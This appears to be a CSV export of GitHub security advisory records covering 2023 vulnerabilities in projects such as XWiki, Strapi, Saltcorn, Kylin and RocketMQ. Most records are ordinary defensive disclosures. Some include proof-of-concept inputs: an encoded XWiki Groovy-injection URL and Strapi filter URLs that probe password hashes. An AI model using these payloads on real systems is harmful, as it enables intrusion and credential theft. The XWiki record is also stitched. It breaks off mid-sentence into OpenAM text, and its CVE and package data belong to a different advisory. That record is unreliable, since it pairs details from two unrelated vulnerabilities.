'0'}, {'fixed': '32.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40313'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6368'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/2909448b039bd46241efa52c450ffdb4f5a7dee1'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/horizon/32/releasenotes/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-18T21:51:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-ff45-2jp9-69jc,2023-08-21T20:18:07Z,2023-08-19T03:32:19Z,,['CVE-2023-4433'],Cockpit Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 36d1d4d256cbbab028342ba10cc493e5c119172c and anticipated to be part of version 2.6.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4433'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/36d1d4d256cbbab028342ba10cc493e5c119172c'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/64f3253d-6852-4b9f-b870-85e896007b1a'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:18:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-97mg-9jhf-r7rm,2023-08-16T21:06:45Z,2023-08-16T15:30:18Z,,['CVE-2023-40347'],Jenkins Maven Artifact ChoiceListProvider (Nexus) Plugin vulnerable to exposure of system-scoped credentials,"Jenkins Maven Artifact ChoiceListProvider (Nexus) Plugin 1.14 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration. This allows attackers with Item/Configure permission to access and capture credentials they are not entitled to. As of publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:maven-artifact-choicelistprovider'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40347'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3153'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:06:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-gvvx-fc6p-2h9x,2023-08-21T20:46:50Z,2023-08-21T12:30:19Z,2023-08-21T20:46:50Z,[],Duplicate Advisory: Wallabag user can delete own API client unintentionally,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-gjvc-55fw-v6vq. This link is maintained to preserve external references. ## Original Description Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.6.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.6.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4455'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/ffcc5c9062fcc8cd922d7d6d65edbe5efae96806'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5ab1b206-5fe8-4737-b275-d705e76f193a'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:46:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-cf7p-gm2m-833m,2023-08-15T20:39:56Z,2023-07-14T21:31:08Z,,['CVE-2023-38325'],cryptography mishandles SSH certificates,The cryptography package before 41.0.2 for Python mishandles SSH certificates that have critical options.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cryptography'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '40.0.0'}, {'fixed': '41.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38325'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/issues/9207'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/pull/7960'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/pull/9208'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/commit/1ca7adc97b76a9dfbd3d850628b613eb93b78fc3'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyca/cryptography'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/compare/41.0.1...41.0.2'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/cryptography/PYSEC-2023-112.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NMCCTYY3CSNQBFFYYC5DAV6KATHWCUZK/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/cryptography/#history'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230824-0010/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T22:14:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-wqc8-x2pr-7jqh,2023-07-11T19:40:20Z,2023-07-10T21:53:22Z,,['CVE-2023-37271'],RestrictedPython vulnerable to arbitrary code execution via stack frame sandbox escape,"### Impact RestrictedPython does not check access to stack frames and their attributes. Stack frames are accessible within at least generators and generator expressions, which are allowed inside RestrictedPython. An attacker with access to a RestrictedPython environment can write code that gets the current stack frame in a generator and then walk the stack all the way beyond the RestrictedPython invocation boundary, thus breaking out of the restricted scope allowing the call of unrestricted Python code and therefore potentially allowing arbitrary code execution in the Python interpreter. All RestrictedPython deployments that allow untrusted users to write Python code in the RestrictedPython environment are at risk. In terms of Zope and Plone, this would mean deployments where the administrator allows untrusted users to create and/or edit objects of type `Script (Python)`, `DTML Method`, `DTML Document` or `Zope Page Template`. This is a non-default configuration and likely to be extremely rare. ### Patches The problem has been fixed in releases 5.3 and 6.1. ### Workarounds There is no workaround available. If you cannot upgrade to the latest release you should ensure the RestrictedPython environment is only available for trusted users. ### References - [RestrictedPython security advisory GHSA-wqc8-x2pr-7jqh](https://github.com/zopefoundation/RestrictedPython/security/advisories/GHSA-wqc8-x2pr-7jqh) ## For more information If you have any questions or comments about this advisory: - Open an issue in the [RestrictedPython issue tracker](https://github.com/zopefoundation/RestrictedPython/issues) - Email us at [security@plone.org](mailto:security@plone.org) ## Credits Thanks for analysing and reporting the go to: - Nakul Choudhary (Quasar0147 on GitHub) - despawningbone on GitHub - Robert Xiao (nneonneo on GitHub)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'RestrictedPython'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'RestrictedPython'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0a1.dev0'}, {'fixed': '6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'restrictedpython'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/RestrictedPython/security/advisories/GHSA-wqc8-x2pr-7jqh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37271'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/RestrictedPython/commit/c8eca66ae49081f0016d2e1f094c3d72095ef531'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/restrictedpython/PYSEC-2023-118.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/RestrictedPython'}]","{'cwe_ids': ['CWE-913'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:53:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-ppxx-m926-g569,2023-08-08T21:28:39Z,2023-07-06T19:24:01Z,,['CVE-2022-24697'],Apache Kylin vulnerable to remote code execution,"Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be implemented by closing the single quotation marks around the parameter value of “-- conf=” to inject any operating system command into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-core-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-spark-project'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-server-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24697'}, {'type': 'WEB', 'url': 'https://github.com/apache/kylin/pull/1811'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/kylin'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/07mnn9c7o314wrhrwjr10w9j5s82voj4'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2022/12/30/1'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:23:09Z', 'nvd_published_at': '2022-10-13T13:15:00Z'}" 1.4.0,GHSA-wxf3-4fvj-vqqx,2023-09-06T19:20:43Z,2023-07-27T19:28:02Z,,[],Unsafe plugins can be installed via pack import by tenant admins,"### Summary Unsafe plugins (for instance `sql-list`) can be installed in subdomain tenants via pack import even if unsafe plugin installation for tenants is disables ### Details I have an example https://bot20230704.saltcorn.com/view/all_plugins It's publicly accessible (but has not so secure values except list of tenants). But using this mech one can read **any** data from other tenants. ### Impact All tenants of installation (i.e. `saltcorn.com`), can be compromised from tenant user has admin access. If an untrusted user has admin rights to a tenant instance, they will be able to install a plug-in that can access information from other tenants ### Revived after 0.8.7 After patch in 0.8.7 this is not fixed completely. Here are steps to reproduce: 1. Publish to NPM plugin that was not approved by admin (in case of saltcorn.com) by @glutamate. I've just published this one: https://www.npmjs.com/package/saltcorn-qrcode 2. Publish somewhere plugin store that includes plugin from previous step: https://gist.github.com/pyhedgehog/f1fd7cb13f4d0a7ccf6a965748d19bd2 3. Add plugin store link to tenant store. 4. Install plugin. 5. Use it in tenant: https://bot20230704.saltcorn.com/view/testqr_show/1 Here are logic: Unsafe plugins checked against this list: https://github.com/saltcorn/saltcorn/blob/99fe277e497fd193bb070acd8c663aa254a9907c/packages/server/load_plugins.js#L191 But it's under control of tenant admin, not server admin. Proposed login: ```javascript const safes = getRootState().getConfig(""available_plugins"",[]).filter(p=>!p.unsafe).map(p=>p.location); ``` ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@saltcorn/cli'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/saltcorn/saltcorn/security/advisories/GHSA-wxf3-4fvj-vqqx'}, {'type': 'WEB', 'url': 'https://github.com/saltcorn/saltcorn/pull/1973'}, {'type': 'WEB', 'url': 'https://github.com/saltcorn/saltcorn/commit/0f32a51277a635c814a634bda9b6d358fb8c04ab'}, {'type': 'PACKAGE', 'url': 'https://github.com/saltcorn/saltcorn'}, {'type': 'WEB', 'url': 'https://github.com/saltcorn/saltcorn/blob/99fe277e497fd193bb070acd8c663aa254a9907c/packages/server/load_plugins.js#L191'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-27T19:28:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-ggwr-4vr8-g7wv,2023-07-21T18:14:14Z,2023-07-12T12:31:36Z,,['CVE-2023-22887'],Apache Airflow Path Traversal vulnerability,"Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an attacker to perform unauthorized file access outside the intended directory structure by manipulating the run_id parameter. This vulnerability is considered low since it requires an authenticated user to exploit it. It is recommended to upgrade to a version that is not affected","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22887'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/32293'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/05bd90f563649f2e9c8f0c85cf5838315a665a02'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-104.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/rxddqs76r6rkxsg1n24d029zys67qwwo'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:30:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-9xg4-3qfm-9w8f,2023-07-25T17:17:37Z,2023-07-25T17:17:37Z,,['CVE-2023-34235'],Leaking sensitive user information still possible by filtering on private with prefix fields,"### Summary Still able to leak private fields if using the t(number) prefix ### Details Knex query allows you to change there default prefix ```SqliteError: select distinct `t0`.* from `pages` as `t0` left join `admin_users` as `t1` on `t0`.`updated_by_id` = `t1`.`id` where (`t1`.`password` = 1)``` so if you change the prefix to the same as it was before or to an other table you want to query you query changes from password to t1.password password is protected by filtering protections but t1.password is not protected ### PoC 1 Create a contentType 2 add to its options ""populateCreatorFields"" 3 create 1 entity in your new content type 4 in settings enable the find route in settings for the content type you created for public 5 /api/(Your contenttype)?filters%5BupdatedBy%5D%5Bt1.password%5D%5B%24startsWith%5D=a%24 And now the api returns noting if you were to do /api/(Your contenttype)?filters%5BupdatedBy%5D%5Bt1.password%5D%5B%24startsWith%5D=%24 it would return your entity ### Impact You can do filtering attacks on everything related to the object again including admin passwords and reset-tokens.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@strapi/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.10.7'}}, {'package': {'ecosystem': 'npm', 'name': '@strapi/utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.10.7'}}]","[{'type': 'WEB', 'url': 'https://github.com/strapi/strapi/security/advisories/GHSA-9xg4-3qfm-9w8f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34235'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v4.10.8'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T17:17:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-4hm4-94g6-f23f,2023-07-12T22:31:25Z,2023-07-12T18:30:38Z,,['CVE-2023-37949'],Jenkins Orka by MacStadium Plugin missing permission check,"Jenkins Orka by MacStadium Plugin 1.33 and earlier does not perform a permission check in an HTTP endpoint. This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. Orka by MacStadium Plugin 1.34 requires Overall/Administer permission to access the affected HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:macstadium-orka'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.34'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37949'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3128'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:31:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-h4vp-69r8-gvjg,2023-07-14T21:53:52Z,2023-07-14T21:53:52Z,,['CVE-2023-37462'],org.xwiki.platform:xwiki-platform-skin-ui Eval Injection vulnerability,"### Impact Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to a possible privilege escalation from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable by opening `/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view` where SAMLPOSTProfileServlet SAMLPOSTProfileServlet com.sun.identity.saml.servlet.SAMLPOSTProfileServlet ... SAMLSOAPReceiver /SAMLSOAPReceiver ``` ### References #624 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.openidentityplatform.openam:openam-federation-library'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.7.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-4mh8-9wq6-rjxg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37471'}, {'type': 'WEB', 'url': 'https://github.com/OpenIdentityPlatform/OpenAM/pull/624'}, {'type': 'WEB', 'url': 'https://github.com/OpenIdentityPlatform/OpenAM/commit/7c18543d126e8a567b83bb4535631825aaa9d742'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenIdentityPlatform/OpenAM'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-20T18:54:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-q347-jrx8-5pw9,2023-07-17T10:50:54Z,2023-07-16T03:30:52Z,,['CVE-2023-3692'],Admidio vulnerable to Unrestricted Upload of File with Dangerous Type,Unrestricted Upload of File with Dangerous Type in GitHub repository admidio/admidio prior to 4.2.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3692'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/d66585d14b1160712a8a9bfaf9769dd3da0e9a83'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/be6616eb-384d-40d6-b1fd-0ec9e4973f12'}]","{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T10:50:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-59jf-3q9v-rh6g,2023-07-25T18:27:16Z,2023-07-25T18:27:16Z,,['CVE-2023-38500'],By-passing Cross-Site Scripting Protection in HTML Sanitizer,"> ### CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.4) ### Problem Due to an encoding issue in the serialization layer, malicious markup nested in a `noscript` element was not encoded correctly. `noscript` is disabled in the default configuration, but might have been enabled in custom scenarios. This allows bypassing the cross-site scripting mechanism of [`typo3/html-sanitizer`](https://packagist.org/packages/typo3/html-sanitizer). ### Solution Update to `typo3/html-sanitizer` versions 1.5.1 or 2.1.2 that fix the problem described. ### Credits Thanks to David Klein and Yaniv Nizry who reported this issue, and to TYPO3 security team members Oliver Hader and Benjamin Franzke who fixed the issue. ### References * [TYPO3-CORE-SA-2023-002](https://typo3.org/security/advisory/typo3-core-sa-2023-002) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/html-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/html-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/html-sanitizer/security/advisories/GHSA-59jf-3q9v-rh6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38500'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/html-sanitizer/commit/e3026f589fef0be8c3574ee3f0a0bfbe33d7ebdb'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/html-sanitizer'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2023-002'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T18:27:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-6hvv-j432-23cv,2023-07-14T21:52:09Z,2023-07-14T21:52:09Z,,['CVE-2023-34236'],Weave GitOps Terraform Controller Information Disclosure Vulnerability,"### Impact A vulnerability has been identified in Weave GitOps Terraform Controller which could allow an authenticated remote attacker to view sensitive information. This vulnerability stems from Weave GitOps Terraform Runners (`tf-runner`), where sensitive data is inadvertently printed - potentially revealing sensitive user data in their pod logs. In particular, functions `tfexec.ShowPlan`, `tfexec.ShowPlanRaw`, and `tfexec.Output` are implicated when the `tfexec` object set its `Stdout` and `Stderr` to be `os.Stdout` and `os.Stderr`. An unauthorized remote attacker could exploit this vulnerability by accessing these prints of sensitive information, which may contain configurations or tokens that could be used to gain unauthorized control or access to resources managed by the Terraform controller. A successful exploit could allow the attacker to utilize this sensitive data, potentially leading to unauthorized access or control of the system. ### Patches This vulnerability has been addressed in Weave GitOps Terraform Controller versions `v0.14.4` and `v0.15.0-rc.5`. Users are urged to upgrade to one of these versions to mitigate the vulnerability. The patches for this vulnerability are found in: - this commit: 9708fda28ccd0466cb0a8fd409854ab4d92f7dca - this commit: 6323b355bd7f5d2ce85d0244fe0883af3881df4e - this commit: 28282bc644054e157c3b9a3d38f1f9551ce09074 - and this commit: 98a0688036e9dbcf43fa84960d9a1ef3e09a69cf ### Workarounds As a temporary measure until the patch can be applied, users can add the environment variable `DISABLE_TF_LOGS` to the tf-runners via the runner pod template of the Terraform Custom Resource. This will prevent the logging of sensitive information and mitigate the risk of this vulnerability. ### References - The first issue: https://github.com/weaveworks/tf-controller/issues/637 - The second issue: https://github.com/weaveworks/tf-controller/issues/649 ### For More Information If you have any further questions or comments about this advisory: Open an issue in the Weave GitOps Terraform Controller repository Email us at [security@weave.works](mailto:security@weave.works) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaveworks/tf-controller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaveworks/tf-controller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.15.0-rc.1'}, {'fixed': '0.15.0-rc.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/security/advisories/GHSA-6hvv-j432-23cv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34236'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/issues/637'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/issues/649'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/28282bc644054e157c3b9a3d38f1f9551ce09074'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/6323b355bd7f5d2ce85d0244fe0883af3881df4e'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/9708fda28ccd0466cb0a8fd409854ab4d92f7dca'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/98a0688036e9dbcf43fa84960d9a1ef3e09a69cf'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaveworks/tf-controller'}]","{'cwe_ids': ['CWE-200', 'CWE-312', 'CWE-522', 'CWE-532'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:52:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-gpq8-963w-8qc9,2023-07-20T14:54:54Z,2023-07-12T12:31:36Z,,['CVE-2023-37582'],RocketMQ NameServer component Code Injection vulnerability,"The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.rocketmq:rocketmq-namesrv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.rocketmq:rocketmq-namesrv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37582'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/rocketmq'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/1'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:30:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-q6cq-8r4j-6rj5,2023-07-12T22:30:48Z,2023-07-12T18:30:39Z,,['CVE-2023-37960'],Jenkins 